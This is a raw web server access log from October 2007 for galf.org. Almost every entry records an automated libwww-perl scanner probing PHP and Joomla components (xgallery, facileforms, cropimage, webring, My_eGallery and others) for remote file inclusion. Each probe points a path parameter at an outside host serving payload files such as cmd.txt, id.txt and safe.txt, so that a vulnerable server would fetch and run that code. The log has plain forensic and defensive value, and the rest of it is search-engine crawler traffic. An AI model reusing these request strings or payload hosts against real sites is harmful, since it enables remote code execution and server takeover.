66.155.104.239 - - [15/Oct/2007:13:34:33 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:34:40 -0700] "GET /logs/access.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:34:40 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:34:40 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:34:57 -0700] "GET /logs/access_070917.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:34:59 -0700] "GET /logs/access_070917.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.106.55.105 - - [15/Oct/2007:13:35:20 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.55.105 - - [15/Oct/2007:13:35:20 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.106.55.105 - - [15/Oct/2007:13:35:21 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:13:36:29 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:13:36:47 -0700] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:13:36:48 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:13:36:48 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:36:53 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:36:54 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.216.123.11 - - [15/Oct/2007:13:36:54 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.inteligentesite.com.br/arquivos/marajoara/File/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:13:36:56 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:13:36:56 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:13:36:57 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:36:57 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
66.216.123.11 - - [15/Oct/2007:13:36:59 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.inteligentesite.com.br/arquivos/marajoara/File/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:13:36:59 -0700] "GET /logs/access_070702.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:13:37:20 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.173.252.15 - - [15/Oct/2007:13:39:04 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.173.252.15 - - [15/Oct/2007:13:39:05 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.173.252.15 - - [15/Oct/2007:13:39:05 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:39:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:39:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:13:39:37 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:13:39:37 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:13:39:38 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
82.208.58.8 - - [15/Oct/2007:13:39:38 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.30.216.88 - - [15/Oct/2007:13:40:48 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.142.215.141 - - [15/Oct/2007:13:42:07 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lovesdj.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.142.215.141 - - [15/Oct/2007:13:42:08 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lovesdj.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.180.250.121 - - [15/Oct/2007:13:42:26 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.84.103.42 - - [15/Oct/2007:13:43:21 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:13:43:27 -0700] "GET /logs/access_070917.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:13:43:27 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:13:43:27 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [15/Oct/2007:13:44:17 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.3.14 - - [15/Oct/2007:13:44:48 -0700] "GET /logs/index2.php?url_page=http://missdica.com/board/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.3.14 - - [15/Oct/2007:13:44:48 -0700] "GET /index2.php?url_page=http://missdica.com/board/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.98.120.207 - - [15/Oct/2007:13:45:53 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.120.207 - - [15/Oct/2007:13:45:53 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.120.207 - - [15/Oct/2007:13:45:54 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.173.252.15 - - [15/Oct/2007:13:46:43 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:13:47:35 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:13:47:35 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
169.207.64.5 - - [15/Oct/2007:13:47:39 -0700] "GET /logs/access_070827.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
169.207.64.5 - - [15/Oct/2007:13:47:40 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
169.207.64.5 - - [15/Oct/2007:13:47:41 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:13:48:20 -0700] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://markzware.3f8h.net/skins/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:13:48:20 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://markzware.3f8h.net/skins/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
169.207.64.5 - - [15/Oct/2007:13:48:24 -0700] "GET /logs/access_071001.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:13:50:02 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:13:52:09 -0700] "GET /logs/access_070730.log/modules/My_eGallery/index.php?basepath=http://markzware.3f8h.net/skins/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.23.164 - - [15/Oct/2007:13:52:36 -0700] "GET /logs/?M=A HTTP/1.0" 200 5069 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.142.215.141 - - [15/Oct/2007:13:52:57 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lovesdj.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:53:43 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:53:43 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:53:44 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:53:44 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.142.215.141 - - [15/Oct/2007:13:53:47 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lovesdj.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:53:50 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.248.204 - - [15/Oct/2007:13:53:50 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.141.39.43 - - [15/Oct/2007:13:54:30 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.43 - - [15/Oct/2007:13:54:31 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.43 - - [15/Oct/2007:13:54:31 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.106.55.105 - - [15/Oct/2007:13:54:31 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:13:57:46 -0700] "GET /logs/calendar/samplecalendar.php?path[docroot]=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:13:57:46 -0700] "GET /calendar/samplecalendar.php?path[docroot]=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
193.242.108.70 - - [15/Oct/2007:13:58:14 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.khabox.net/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.242.108.70 - - [15/Oct/2007:13:58:20 -0700] "GET //skin/zero_vote/error.php?dir=http://www.khabox.net/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.242.108.70 - - [15/Oct/2007:13:58:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.khabox.net/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.163.167.235 - - [15/Oct/2007:13:58:48 -0700] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.163.167.235 - - [15/Oct/2007:13:58:49 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.163.167.235 - - [15/Oct/2007:13:58:49 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:59:07 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.163.167.235 - - [15/Oct/2007:13:59:08 -0700] "GET /logs/access_070702.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.204 - - [15/Oct/2007:13:59:12 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.19.229 - - [15/Oct/2007:13:59:22 -0700] "GET /logs/access_071015.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.193.248.204 - - [15/Oct/2007:13:59:23 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
68.180.250.101 - - [15/Oct/2007:14:00:25 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
60.234.65.98 - - [15/Oct/2007:14:00:45 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
60.234.65.98 - - [15/Oct/2007:14:00:45 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
60.234.65.98 - - [15/Oct/2007:14:00:45 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.13.211 - - [15/Oct/2007:14:01:29 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.249.13.211 - - [15/Oct/2007:14:01:29 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.13.211 - - [15/Oct/2007:14:01:29 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.249.13.211 - - [15/Oct/2007:14:01:29 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
89.171.255.5 - - [15/Oct/2007:14:02:57 -0700] "GET /logs/access_071001.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.171.255.5 - - [15/Oct/2007:14:02:58 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.161 - - [15/Oct/2007:14:03:56 -0700] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=hhttp://geunyoung.hs.kr/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.38.12.161 - - [15/Oct/2007:14:03:57 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=hhttp://geunyoung.hs.kr/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.161 - - [15/Oct/2007:14:03:57 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=hhttp://geunyoung.hs.kr/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.204.11.65 - - [15/Oct/2007:14:04:01 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.204.11.65 - - [15/Oct/2007:14:04:01 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.204.11.65 - - [15/Oct/2007:14:04:02 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.204.11.65 - - [15/Oct/2007:14:04:02 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
81.169.134.8 - - [15/Oct/2007:14:04:04 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:14:04:05 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.20.201 - - [15/Oct/2007:14:04:13 -0700] "GET /logs/access_071001.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.141.39.43 - - [15/Oct/2007:14:05:59 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
218.38.12.161 - - [15/Oct/2007:14:06:33 -0700] "GET /logs/access_070618.log//modules/My_eGallery/public/displayCategory.php?basepath=hhttp://geunyoung.hs.kr/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.171.255.5 - - [15/Oct/2007:14:07:22 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.16.195.170 - - [15/Oct/2007:14:07:24 -0700] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:14:07:41 -0700] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.117.189.143 - - [15/Oct/2007:14:08:50 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; FDM)" "www.galf.org"
